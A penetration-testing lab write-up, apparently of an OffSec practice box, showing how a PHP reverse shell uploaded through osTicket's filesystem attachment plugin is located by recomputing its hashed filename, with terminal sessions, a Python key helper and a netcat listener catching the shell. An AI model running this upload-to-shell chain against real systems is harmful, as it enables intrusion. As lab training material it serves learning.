Attachments on the Filesystem Plugin


After exploiting CVE-2019-14748 to gain access to the admin panel, an installed but disabled plugin named Attachments on the Filesystem was found. This plugin stores attachment files directly on the host filesystem, under /var/www/html/attachments.

Because osTicket is a PHP application and that directory sits inside the web root, a PHP file uploaded as an attachment could be requested through the web server and executed, giving arbitrary code execution and a possible system compromise.

Enabling the “Attachments on the Filesystem” plugin

According to the official documentation, the Store Attachments setting has to be changed manually to the filesystem backend.

The maximum file size is also set to 2 MB, and the Login required option is unchecked so that attachments can be fetched without authenticating.

Issue


Uploading a PHP reverse shell, shell.php, as an attachment.

Checking the /attachments directory reveals a sub-directory, 8, where the uploaded files are stored.

The uploaded shell cannot be reached under its original name.

Workaround


Checking back with the official documentation shows that uploaded files are renamed on disk to a value derived from a hash of their contents.

Searching online for a solution turns up a GitHub repository with a Bash script that recovers the on-disk filename of an uploaded file.

Exploitation


Clicking the uploaded file reveals its URL key: uvmmvsrur7ax6-nskx__tn9mk6l1dwm4

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/megavolt]
└─$ php -a 
Interactive shell
 
php > $sha1 = base64_encode(sha1_file('/home/kali/PEN-200/PG_PRACTICE/megavolt/shell.php', true));
php > print(str_replace(array('=','+','/'), array('','-','_'), $sha1));
SrUr7AX6-nSkx__Tn9MK6l1dWm4

Following the documented steps (SHA-1 of the file, Base64, then strip the = padding and swap + and / for - and _) yields the file key SrUr7AX6-nSkx__Tn9MK6l1dWm4. Note that the lower-cased file key is the tail of the URL key shown in the ticket; the case information lost there is what recomputing the key from the original file restores.
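The same derivation in Python, as an added example that is not part of the original write-up or of osTicket's own code. It reproduces the php -a transform above (SHA-1 of the file bytes, Base64, drop the = padding, replace + and / with - and _) and checks a computed key against the URL key from the ticket. The URL key and file key constants are the two values from this write-up; the sample bytes in the usage section are constructed, and the assumption that a URL key always ends in the lower-cased file key is generalised from those two values only.

```python
#!/usr/bin/env python3
"""Added example: recompute an osTicket file key and compare it to a URL key.

Not code from the write-up or from osTicket. It mirrors the php -a session:
    base64_encode(sha1_file(path, true)) with '=' dropped and '+','/' -> '-','_'
"""
import base64
import hashlib
from pathlib import Path

# Values taken from the write-up (ticket URL key and recomputed file key).
URL_KEY = "uvmmvsrur7ax6-nskx__tn9mk6l1dwm4"
FILE_KEY = "SrUr7AX6-nSkx__Tn9MK6l1dWm4"


def file_key(data: bytes) -> str:
    """Return the URL-safe, unpadded Base64 of SHA-1(data).

    SHA-1 is 20 bytes, so the Base64 form is 28 characters with a single
    '=' of padding; after stripping it the key is always 27 characters.
    """
    digest = hashlib.sha1(data).digest()
    b64 = base64.b64encode(digest).decode("ascii")
    return b64.rstrip("=").replace("+", "-").replace("/", "_")


def file_key_from_path(path: str) -> str:
    """Same as file_key(), but reads the file from disk like sha1_file()."""
    return file_key(Path(path).read_bytes())


def matches_url_key(url_key: str, key: str) -> bool:
    """Check that a (case-sensitive) file key is consistent with the
    lower-cased URL key shown in the ticket view.

    Assumption (generalised from the two values in the write-up): the URL
    key ends in the lower-cased file key, so the URL key alone cannot give
    the exact on-disk name, but it does tell you whether the key you
    recomputed from your local copy belongs to that attachment.
    """
    return url_key.lower().endswith(key.lower())


if __name__ == "__main__":
    # Constructed sample payload; in practice pass the exact bytes you uploaded.
    sample = b"<?php echo 'constructed sample, not a shell'; ?>\n"
    print("file key for sample:", file_key(sample))
    print("write-up key matches write-up URL key:",
          matches_url_key(URL_KEY, FILE_KEY))
```

Run it against the exact file you uploaded (file_key_from_path("shell.php")); any change to the bytes, even a trailing newline, changes the SHA-1 and therefore the key, so keep a byte-identical local copy of the attachment.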

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/megavolt]
└─$ ./osticket_upload_shell.sh
 
            ---------------------------------
            -                               -
            -   Osticket guess file path    -
            -                               -
            -       Github:@Und3r-r00t      -
            -                               -
            ---------------------------------
 
[note!]
[*] Attachments on the filesystem
[*] https://docs.osticket.com/en/latest/Plugins/Attachments on the Filesystem.html
 
Target: 192.168.177.115
Url key: uvmmvsrur7ax6-nskx__tn9mk6l1dwm4
File key: SrUr7AX6-nSkx__Tn9MK6l1dWm4
 
[...REDACTED...]

The Bash script brute-forces candidate filenames, sending a GET request with curl for each one. It eventually hits the right path, the uploaded PHP executes, and the reverse shell connects back to the listener.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/megavolt]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.177.115] 49840
SOCKET: Shell has connected! PID: 3294
whoami
apache
hostname
megavolt
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:d8:91 brd ff:ff:ff:ff:ff:ff
    inet 192.168.177.115/24 brd 192.168.177.255 scope global ens160
       valid_lft forever preferred_lft forever

An initial foothold on the target was established as the apache account by exploiting the file upload in osTicket 1.8: the Attachments on the Filesystem plugin wrote the uploaded PHP file inside the web root, where the web server executed it.